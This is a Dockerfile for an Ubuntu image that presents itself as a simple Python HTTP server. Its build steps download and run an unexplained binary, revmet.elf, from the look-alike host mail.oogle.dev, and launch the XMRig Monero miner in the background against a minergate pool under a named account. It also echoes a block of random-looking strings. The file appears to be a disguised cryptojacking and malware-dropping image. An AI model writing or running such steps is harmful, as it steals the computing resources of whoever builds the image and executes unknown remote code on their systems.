FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo TIt604IrM9Zes0260oh826jpRve7AIHp aikdwGz6D5fSX53BLXoyK1y1eWmXSGWC GfQBWXPGuhIioTvKuIJSOfjharHuBqgB vUitIlDe4c4vs3XFCqMFU5xYQJuNZLtX kq3fbMo9FqLuP6OrBQ49d5RRnoWyb9lK vc21qWUxDnnCHgihpDAlaLo5Ia24rkRX RZ5qfu7tEDJn9YzqjNqtLWHPadhbvGLj IDawaepeWPhIYPaCxiwisK9A2j3TFgQd 5hJcMqAmh65w4LVPYdn7ITySSehz0DDM KmA46guJju84FCwJNacW76CcqlhHY3lB g8YjA6f2ksPZQPyHJoYRN27VFDRFYsH2 aAONOwaGZD8JxcmmLw0se0mfi9577GjK sAFpFLCXee6WL16YdK6r5iqy4NmvAyCK lRfUD3c6OBnSoyiIctveEhcAabG4ebK4 9Gxn11fBho040DdbWCYFPvsTgz9OHoeR B6CWSV6xn09049tsmZrXOzEPmsFNidw1 QEr7hKkzk0cFfV5gsIoTflQegqev5ehZ DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]